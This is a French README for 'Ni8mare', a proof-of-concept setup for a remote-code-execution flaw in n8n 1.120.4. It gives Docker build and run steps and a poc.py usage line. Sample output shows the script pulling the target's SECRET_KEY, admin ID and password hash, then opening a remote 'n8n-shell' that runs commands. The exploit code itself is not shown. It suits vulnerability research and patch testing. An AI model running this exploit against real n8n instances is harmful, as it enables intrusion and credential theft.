
Ni8mare, n8n RCE
Environnement PoC pour n8n 1.120.4 avec un workflow de déclencheur de formulaire et un script d'exploitation.
Dockerfile — construit l'environnement vulnérable n8nrun.bat — exécute le conteneur (Windows)workflow.txt — workflow n8n (inclut le déclencheur de formulaire)poc.py — script PoCrequirements.txt — dépendances PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, identifiants admin) de la cible.n8n-shell>) est fournie.id) renvoie la sortie de l'environnement cible (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Nous publions une analyse de CVE et de malware une fois par mois. Si vous êtes intéressé, veuillez suivre les liens ci-dessous pour consulter nos publications.